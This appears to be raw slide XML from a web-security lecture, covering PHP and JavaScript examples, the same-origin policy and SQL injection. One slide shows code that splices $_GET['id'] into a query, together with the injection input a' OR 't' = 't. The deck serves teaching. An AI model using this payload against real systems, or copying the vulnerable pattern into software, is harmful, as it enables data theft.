            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>             echo ‘&lt;td width=“100px”&gt;’.$result[0].’&lt;/td&gt;’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>             echo ‘&lt;td width=“100px”&gt;’.$result[1].’&lt;/td&gt;’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>             echo ‘&lt;td width=“100px”&gt;’.$result[2].’&lt;/td&gt;’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>         echo ‘&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    echo ‘&lt;/table&gt;’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?&gt;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Web Applications: Client-Side Script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000132" y="1142984"/>
            <a:ext cx="7000892" cy="53578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600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    &lt;title&gt;Example 2&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;script type=‘text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>submit_form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>            if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user_account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’).value!=“”)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>project_form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’).submit();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>            }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    &lt;form id=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>project_form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’ action=‘my_project.php’ method=‘POST’&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        &lt;input type=‘text’ name=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user_account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’ id=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user_account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’ /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        &lt;input type=‘button’  value=‘OK’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>submit_form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>();’ /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        &lt;input type=‘reset’ value=‘Reset’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    &lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="16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Same-Origin Policy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 policy permits scripts running on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pages originating from the same site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to access each other's DOM with no specific restrictions, but prevents access to DOM on different sites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Without this, scripts from a malicious site can easily steal another site’s session cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>There are relaxes, corner cases, and exceptions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The same-origin policy also applies to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>XMLHttpRequests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> unless the server provides an Access-Control-Allow-Origin (CORS) header.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>WebSockets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> subject to the same-origin policy.</a:t>
            </a:r>
          </a:p>
          <a:p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Vulnerable Web Applications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50950"/>
            <a:ext cx="8229600" cy="5226050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Web applications open a door to the backend servers and are supposed to be secure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Unfortunately, many of them have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>may be exploited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> by the attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Most security vulnerabilities are a result of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bad programming practices </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> programming errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Possible damages:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Personal data, e.g., accounts/passwords, get stolen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Websites get sabotaged or infected and used as launch sites of other attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>These may bare financial or legal consequences.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A Common Vulnerability: SQL Injection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User’s inputs are used as parts of an SQL query, without being checked/validated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>Attackers may </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t> the vulnerability to read, update, create, or delete arbitrary data in the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>Example (display all users’ information):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Relevant code in a vulnerable application:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>The attacker types in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a’ OR ‘t’ = ‘t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>as the input for id.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>The actual query executed:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>So, the attacker gets to see every row from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> table.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1214414" y="3929066"/>
            <a:ext cx="6357982" cy="35719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$</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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sql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 = “SELECT * FROM users WHERE id = ‘” . </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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$_GET[‘id’] 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. “’”;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214414" y="5214950"/>
            <a:ext cx="6357982" cy="35719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SELECT * FROM users WHERE id = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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a’ OR ‘t’ = ‘t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’;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SQL Injection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zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="群組 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="413268" y="1243415"/>
            <a:ext cx="8339882" cy="5301563"/>
            <a:chOff x="413268" y="1243413"/>
            <a:chExt cx="8339882" cy="5301563"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1958608" y="6206422"/>
              <a:ext cx="214969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>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>message User </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>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413268" y="1245651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A</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ttacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Line 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4739158" y="6371718"/>
              <a:ext cx="656794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0" name="Line 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1160268" y="6358229"/>
              <a:ext cx="656794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1" name="Text Box 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5478057" y="6204942"/>
              <a:ext cx="327509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 dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>message User unaware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12" name="Rectangle 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="703063" y="6260298"/>
              <a:ext cx="7655151" cy="242456"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="sq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kumimoji="0" lang="zh-TW" altLang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp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4014144" y="1243413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User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7613340" y="1247515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V</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ulnerable</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Website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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="直線接點 14"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="-1255422" y="3956362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6" name="直線接點 15"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="3565044" y="2707796"/>
              <a:ext cx="2000264" cy="13648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7" name="直線接點 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="5942970" y="3942714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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="群組 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4601935" y="2202414"/>
            <a:ext cx="3470540" cy="646331"/>
            <a:chOff x="4610990" y="1643050"/>
            <a:chExt cx="3505200" cy="749863"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19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20" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5038461" y="1643050"/>
              <a:ext cx="2992906" cy="74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/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
                <a:t>1. Send an HTTP request </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="342900" indent="-342900"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
                <a:t>      with id = 5017</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="群組 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596452" y="2931681"/>
            <a:ext cx="3476010" cy="1479945"/>
            <a:chOff x="4604640" y="2143116"/>
            <a:chExt cx="3511550" cy="1717009"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5000628" y="2146153"/>
              <a:ext cx="3115562" cy="1713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 2. </a:t>
              </a:r>
